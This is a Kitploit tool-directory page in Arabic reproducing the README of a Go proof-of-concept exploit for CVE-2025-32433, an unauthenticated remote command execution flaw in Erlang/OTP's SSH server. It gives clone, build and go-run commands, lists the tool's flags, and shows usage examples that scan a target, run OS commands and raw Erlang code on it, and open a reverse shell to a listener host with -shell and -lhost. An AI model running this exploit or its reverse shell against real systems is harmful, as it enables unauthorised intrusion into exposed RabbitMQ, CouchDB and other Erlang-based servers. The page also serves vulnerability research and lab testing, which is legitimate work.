Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2025-32433 — Go PoC لـ CVE-2025-32433 — ثغرة RCE غير مصادق عليه في Erlang/OTP SSH. | Kitploit
أدوات/GitHubGitHub/joshuavanderpoll/cve-2025-32433
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubjoshuavanderpoll/cve-2025-32433

cve-2025-32433

Go PoC لـ CVE-2025-32433 — ثغرة RCE غير مصادق عليه في Erlang/OTP SSH.

عرض المستودع
22منذ 6 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Erlang/OTP SSH ثغرة تنفيذ أوامر عن بعد غير مصادق عليه أعمى (CVE-2025-32433) PoC

Go

📜 الوصف

CVE-2025-32433 هي ثغرة حرجة لتنفيذ أوامر عن بعد غير مصادق عليه في خادم SSH في Erlang/OTP. قبل الإصدارات المصححة، يقوم خادم SSH بمعالجة رسائل القناة بشكل غير صحيح قبل اكتمال المصادقة، مما يسمح للمهاجم بفتح قناة وإرسال طلبات exec دون تقديم بيانات اعتماد على الإطلاق. أي تطبيق يضم خادم SSH الخاص بـ Erlang/OTP (بما في ذلك Elixir، RabbitMQ، CouchDB وغيرها) يتأثر عند تعريض منفذ SSH.

يتصل نموذج إثبات المفهوم هذا بلغة Go بمنفذ SSH مستهدف، ويرسل حمولة SSH_MSG_CHANNEL_OPEN مصممة متبوعة بحمولة تنفيذ SSH_MSG_CHANNEL_REQUEST — بالكامل قبل المصادقة — مما يتسبب في عقدة Erlang البعيدة لتنفيذ أوامر نظام تشغيل عشوائية. التنفيذ أعمى: لا يتم إرجاع أي مخرجات للأوامر إلى المهاجم.

الإصدارات المتأثرة: Erlang/OTP < 27.3.3, < 26.2.5.11, < 25.3.2.20

✨ الميزات

  • فحص الثغرة — استكشاف الهدف لتأكيد قابليته للاختراق قبل الاستغلال
  • تنفيذ الأوامر — تشغيل أوامر نظام التشغيل عبر bash -c، ملفوفة تلقائيًا في os:cmd الخاصة بـ Erlang
  • تنفيذ Erlang خام — إرسال أي تعبير Erlang مباشرة، بدون حاجة إلى غلاف شل
  • شل عكسي — نشر شل عكسي أصلي gen_tcp دون الاعتماد على bash أو /dev/tcp
  • دعم IPv6 — يعمل مع أهداف IPv4 و IPv6
  • لا تبعيات — ملف ثنائي واحد، مكتبة Go القياسية فقط

🛠️ التثبيت

الملفات الثنائية المجمعة مسبقًا لـ macOS و Linux و Windows متاحة على صفحة الإصدارات. قم بتنزيل الملف الثنائي لنظامك وقم بتشغيله مباشرة — لا حاجة لتثبيت Go.

أو البناء من المصدر:

[!NOTE] يتطلب Go 1.21+. لا تبعيات خارجية — يستخدم فقط مكتبة Go القياسية.

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433 cve-2025-32433.go

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433.exe cve-2025-32433.go

التثبيت مباشرة باستخدام Go

root@kitploit:~
go install github.com/joshuavanderpoll/cve-2025-32433@latest

التشغيل بدون تثبيت

root@kitploit:~
go run github.com/joshuavanderpoll/cve-2025-32433@latest -host 192.168.1.100 -port 22

⚙️ الاستخدام

root@kitploit:~
Usage of ./cve-2025-32433:
  -host string
        Target IP or hostname
  -port int
        SSH port (default: 22) (default 22)
  -timeout int
        Connection timeout in seconds (default: 5) (default 5)
  -command string
        Shell command to run on the target (wrapped in os:cmd)
  -code string
        Raw Erlang expression to execute on the target
  -shell
        Send an Erlang-native gen_tcp reverse shell
  -lhost string
        Listener IP for reverse shell (required with -shell)
  -lport int
        Listener port for reverse shell (default: 4444)

التحقق مما إذا كان الهدف ضعيفًا

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222

مثال على فحص الثغرة

تنفيذ الأوامر

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -command 'whoami > /tmp/out2.txt'

مثال على تنفيذ الأوامر

الشل العكسي

العلم -shell يرسل حمولة شل عكسي أصلي gen_tcp لـ Erlang — لا حاجة لـ bash أو /dev/tcp. ابدأ مستمعًا أولاً، ثم أرسل الاستغلال.

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -shell -lhost host.docker.internal -lport 4444 

مثال على الشل العكسي

تنفيذ الأكواد

العلم -code يرسل تعبير Erlang خام مباشرة — بدون غلاف bash -c. مفيد لعمليات Erlang النقية أو عندما لا يكون bash متاحًا على الهدف. نظرًا لأن التنفيذ أعمى، اكتب المخرجات إلى ملف واستردها بشكل منفصل.

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -code 'file:write_file("/tmp/out.txt", os:cmd("id")).'

مثال على تنفيذ الأكواد

🐋 نموذج إثبات مفهوم Docker

مزيد من التفاصيل في docker/DOCKER.md

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# يمكنك الاختبار على -host 127.0.0.1 -port 2222

🕵🏼 المراجع

  • إعلان أمان Erlang/OTP
  • NVD — CVE-2025-32433
  • HackIndex

📢 إخلاء المسؤولية

تم توفير هذه الأداة لأغراض تعليمية وبحثية فقط. لا يتحمل المنشئ أي مسؤولية عن أي سوء استخدام أو ضرر ناتج عن الأداة.

تنزيل الأداة